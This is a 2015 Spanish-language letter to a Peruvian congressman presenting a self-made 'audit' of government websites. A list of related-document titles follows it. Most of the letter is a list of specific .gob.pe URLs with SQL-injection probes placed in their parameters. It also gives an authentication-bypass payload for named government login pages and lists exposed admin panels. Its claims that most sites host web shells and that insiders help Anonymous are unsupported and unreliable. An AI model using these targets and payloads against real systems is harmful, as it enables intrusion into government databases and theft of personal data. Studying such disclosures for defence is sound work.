auditoriade Los Servicios Gubernamentales Del Perú

18
Empresa de seguridad informática BlacklastSecurity Auditoria de los servicios gubernamentales del Perú Ante mano deseo dar un saludo a usted congresista Yehude Simon, en esta oportunidad deseo brindarle a usted mi investigación sobre mi Auditoria a algunos sistemas webs del País, deseo aclarar que no eh hecho nada malo, ni lo eh aprovechado para un acto de delincuencia cibernética, veamos algunos de ellos. Título: Auditoria de servicios web Autor: Omar Rodríguez Editado Por: Omar Rodríguez –Copyright © 2015 Marcona – ICA - Peru http://www.blacklast-security.org/index.php Página 1

description

auditoria

Transcript of auditoriade Los Servicios Gubernamentales Del Perú

Empresa de seguridad informtica BlacklastSecurity

Empresa de seguridad informtica BlacklastSecurityAuditoria de los servicios gubernamentales del Per

Ante mano deseo dar un saludo a usted congresista Yehude Simon, en esta oportunidad deseo brindarle a usted mi investigacin sobre mi Auditoria a algunos sistemas webs del Pas, deseo aclarar que no eh hecho nada malo, ni lo eh aprovechado para un acto de delincuencia ciberntica, veamos algunos de ellos.Ttulo: Auditoria de servicios webAutor: Omar RodrguezEditado Por: Omar Rodrguez Copyright 2015Marcona ICA - PeruDerechos reservados por el Autor

Desde el ao 2012 hasta el presente ao se han generado una cantidad de ataques a los portales del estado, las cuales son generados por los ciberdelicuentes, en su mayora los ataques son otorgados por personas de pases hermanos y los de mayor relevancia son por los grupos conocidos como LulzSec Peru, Anonymous, Mexican Hackers, ETC .Creo que la mayora de los presentes gubernamentales han sido vctimas de ataques de robo de informacin, Espionaje, sabotaje, y la violacin de correo electrnico. Tambin hemos visto ataques directos los servidores webs como vemos en la siguiente pgina web Zone-H la cual es un sitio donde se alojan los sitios webs Defaceados ( hackeados ) por Activistas de la red :

Como acabamos de ver es una lista muy extensa, debo aclarar que segn las estadsticas hay ms de #12000 webs subidas algunas web son Re-hackeadas debo decir que las web del gobierno .gob.pe son conejillos de indias para los que aprenden las tcnicas de penetracin pentesting , porque lo eh visto a lo largo de mi carrera .Es algo avergonz poner algunas de las conversaciones que tuve con mis contactos de otros pases, ya que clasifican que las web del gobierno peruano son de calidad pobre y para pruebas de Pentest.Pero Gracias a este documento puedo manifestar que podemos arreglar este problema tan grande que puede ser perjudicial para nuestro gobierno, como lo hemos visto ltimamente los ataques cada vez traen ms consecuencias a la nacin misma.Ante mano eh estado 2 horas analizando algunos servidores web y me di con la sorpresa de errores perjudiciales de instituciones Grandes, Ante mano espero le guste.

Antes de dar las vulnerabilidades debo aclarar que esta auditoria es propia y que no me agradara que otra persona se tome los crditos mos.Vayamos a los errores SQL:

Qu es un error SQL? SQL significa lenguaje de consulta estructurado, el error SQL son lneas de cdigo mal formuladas, las cuales son generadas al realizar una consulta al servidor.Dichos errores se encuentran en las Estructuras como: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB

Lista de vulnerabilidades SQL de los servidores gob.pe: Errores METODO GET : http://www.munpaucartambo.gob.pe/index.php?option=com_rsgallery2&page=inline&id='30http://www.municatacaos.gob.pe/detalle_serenazgo.php?id='1http://www.ins.gob.pe/APS_Tools/eve.asp?id='18904http://www.municatacaos.gob.pe/turismo/thumb.php?id=48&z='1http://www.regionhuancavelica.gob.pe/portalweb1/index.php?option=com_phocagallery&view=category&id=18:ghuaytara&Itemid='151http://portal.regionamazonas.gob.pe/microsite.php?id='33http://jovenesalaobra.gob.pe/preguntas?page=183&b=ttp://www.sisol.gob.pe/home/hs/hs/calendario_agenda.php?fecha=2015-1-2&codmes=1/2015http://www.mdbsh.gob.pe/detalle-noticia.php?id=31``http://www.municamana.gob.pe/noticia/detalles.php?id=3``http://silnet.mintra.gob.pe:8080/silnet/PreviewOfertaEP.jsp?tarea=cargar&FPEDP_Codigo=75167``http://silnet.trabajo.gob.pe:8080/silnet/PreviewVacantesPublicas.jsp?tarea=cargar&V_NUMREG=0000126220`&V_CODINST=20131370998``http://www.muniindependencia.gob.pe/archivos/ordenanzas.php?anno=1http://jro.igp.gob.pe/mst10/participants/participants_detail.php?id=12``http://www.regionsanmartin.gob.pe/noticias.php?codigo=2859``http://sistemas.indecopi.gob.pe/crtacre/Rep_Metodos_Producto.asp?ID_Producto=961http://www.sis.gob.pe/NotaPrensa/a_NotaPrensa.asp?idNoticia='799http://www.regiontumbes.gob.pe/prensa/NotiP.asp?ID='2417http://www.osce.gob.pe/subportal.asp?ids='8http://www.limaeste.gob.pe/Dirsubarea_fotos.asp?IdDireccion=4&IdArea='33http://www.minsa.gob.pe/oei/servicios/DetalleEstab.asp?id='0000001016http://www.digesa.minsa.gob.pe/expedientes/detalles.aspx?id='9http://www.ugelnasca.gob.pe/index.php?p=home_noticia&id=1'68http://www.minsa.gob.pe/oei/servicios/estab.asp?id='1http://www.munisurquillo.gob.pe/portal/mm.php?id='1http://www.drtpetacna.gob.pe/prg_prin/direccion.php?id='1http://www.municolquioc.gob.pe/info.php?id=1&id2='1http://hospitalnasca.gob.pe/index.php?p'=22http://www.munilaunionpiura.gob.pe/allnoticias.php?_pagi_pg='2http://www.sisol.gob.pe/home/hs/especialidades.php?id='16http://www.drtpetacna.gob.pe/prg_prin/direccion.php?id='1http://www.munipacocha.gob.pe/index.php?pag=galeria_mostrar&n='36http://www.munipaijan.gob.pe/calendario.php?idactividad='70http://mpsm.gob.pe/sondeo_virtual/encuesta.php?id='predhttp://www.regionsanmartin.gob.pe/infotransparencia.php?anio=Seleccione+un+A%C3%B1o&ct=7http://www.municatacaos.gob.pe/turismo/thumb.php?id=24&z=1http://www.munielalto.gob.pe/inicio.php?_pagi_pg='112http://www.muniventanilla.gob.pe/noticia.php?idPublicacion='709http://www.sbh.gob.pe/videoteca/videos.php?idvideoteca=VT0005``http://www.munitayacaja.gob.pe/obras_proyectos/detalles.php?id='OBRA00014http://www.inpe.gob.pe/contenidosprensa_all.php?direccion='1http://www.hdhvca.gob.pe/galeria/fotos.php?idgaleriaGAL0001http://www.hospitalvitarte.gob.pe/portal/mod/transparencia/index.php?transparencia='112

Errores METODO POST: Credenciales de ataque: or'1'='1' or 1=1--http://www.sis.gob.pe/NotaPrensa/Sistema/login.asphttp://ofi.mef.gob.pe/odi/login.asp?mensaje=sihttp://www.app.minsa.gob.pe/stdw/Login.asp?pCodigoEvento=1&pDescripcionError=Usuario%20no%20v%C3%A1lidohttp://www.limaeste.gob.pe/administrador/i_login.asphttp://www.mdmorrope.gob.pe/intranet/login.php?tipo=1http://iinei.inei.gob.pe/iinei/conasis/default.asp?origen=intranet&PATH=iinei.inei.gob.pehttp://www.trujillo.sencico.gob.pe/Login.aspx

PANELES ADMINISTRATIVOS ABIERTOS: http://www.limaeste.gob.pe/administrador/index.asphttp://www.munipimentel.gob.pe/municipalida/administrador/noticia/consultar.phphttp://www.indeci.gob.pe/admin/fckeditor/editor/fckeditor.htmlhttp://app2.inpe.gob.pe/resolucion/Documento/Default.aspx

Las webs que acabo de mencionar solo son algunas de las sientas que faltan por auditar.

Aparte de esos errores tambin existen otros como son XSS Cross-site scripting Es un errortpicode algunas paginas web ya que crea otro portal donde la web es afectada por unaexplotacin" XSS" puede ser modificado en otro plano de web por medio de scriptpeligrosos en Html.

Existen dos tipos de XSS

Directa-(llamadatambinpersistente) Es un tipo de xss que permite insertar los cdigos html que permitan insertar " " o "

Indirecta (llamada tambin reflejada) Este tipo de xss consiste modificar valores que estn en la pgina web para pasar dos variables de pginas web .

Qu pasara si alguien aprovecho las vulnerabilidades que acabo de presentar y entre al panel administrativo as como acabo de entrar al consejo de ministros

Este es otro Error Critico en el congreso. Es un milagro que nadie haya explotado este error y Obtenido todas las base de datos y obtenido informacin de todos los trabajadores, ministros, congresistas y dems miembros del congreso.

Debo aclarar que esta auditora que eh elaborado en este corto tiempo da un ejemplo de las grandes vulnerabilidades que presente dichos servicios, pero no solamente esas vulnerabilidades son las nicas, Hay otras de mayor rango como por ejemplo las vulnerabilidades aprovechadas por #EXPLOIT remotos que ejercen varios tipos de accesos como Webs y Ordenadores .Tambin quiero dejar en claro que las entidades estn con Puertas traseras (Backdoors) que son aplicaciones en php en su mayora son respaldos de accesos para que los ciberdelincuentes puedan entrar a la red desde su ORDENADOR ya sea por la terminal en Linux o Windows.La mayor desventaja que cuentan dichos servicios es que el 60 % tiene alojado una web Shell (que son puertas traseras como el Backdoor) pero son de diseo Visible como pueden ver en la siguiente imagen de ejemplo:

Tambin puedo manifestar que los correos y contraseas son extrados de dichas base de datos y pueden ser encriptados para poder entrar y espiarlos sin que se den cuenta (Ah nacen los Espionajes gubernamentales), es el ataque ms simple y ms fcil que cualquiera puede hacer.Pero todo es externo, tambin se debe notificar que hay trabajadores internos en las instituciones que brindan la informacin, y estn enlazados con miembros de Anonymous Per,Ante mano deseo agradecer que usted haya ledo mi Auditoria, sin ms que decir me despido de un fuerte abrazo.#La Seguridad Informtica esta en las manos de las personas que sepan manejar los sistemas con tica.Actualmente soy estudiante de Ingeniera de sistemas en la UPSJB, resido en marcona.Atentamente: Omar rodrguez

http://www.blacklast-security.org/index.phpPgina 11


Auditoriade El Area de Ti

Auditoriade El Area de Ti

Instituciones gubernamentales

Instituciones gubernamentales

Organizaciones no gubernamentales

Organizaciones no gubernamentales

PR.GOV - Servicios Gubernamentales

PR.GOV - Servicios Gubernamentales

Portales Gubernamentales Web

Portales Gubernamentales Web

Compras Gubernamentales - repositorio.promperu.gob.pe

Compras Gubernamentales - repositorio.promperu.gob.pe

Presentacion Plataformas Gubernamentales

Presentacion Plataformas Gubernamentales

CAPACITACIÓN ENFOCADA EN GRUPO Y REGIÓN · Estados Unidos Mexicanos, República de Nicaragua, República del Perú, 4. Organizaciones objetivo/elegibles: Organismos gubernamentales

CAPACITACIÓN ENFOCADA EN GRUPO Y REGIÓN · Estados Unidos Mexicanos, República de Nicaragua, República del Perú, 4. Organizaciones objetivo/elegibles: Organismos gubernamentales

Empresas no gubernamentales

Empresas no gubernamentales

Politicas gubernamentales

Politicas gubernamentales

Obligaciones Fiscales Gubernamentales

Obligaciones Fiscales Gubernamentales

Sitios gubernamentales

Sitios gubernamentales

Contenidos en portales gubernamentales

Contenidos en portales gubernamentales

PRESENTACIÓN DE DEPENDENCIAS GUBERNAMENTALES

PRESENTACIÓN DE DEPENDENCIAS GUBERNAMENTALES

Sitios gubernamentales nubia

Sitios gubernamentales nubia

Plataformas Gubernamentales

Plataformas Gubernamentales

Datos Abiertos Gubernamentales

Datos Abiertos Gubernamentales

Pag gubernamentales

Pag gubernamentales

Por un Perú en manos limpias. - …bibliotecavirtual.olacefs.com/gsdl/collect/artculos/archives/HASH... · incrementa la probabilidad de acuerdos y de innovación gubernamentales.

Por un Perú en manos limpias. - …bibliotecavirtual.olacefs.com/gsdl/collect/artculos/archives/HASH... · incrementa la probabilidad de acuerdos y de innovación gubernamentales.

guía sobre mecanismos gubernamentales y no gubernamentales de ...

guía sobre mecanismos gubernamentales y no gubernamentales de ...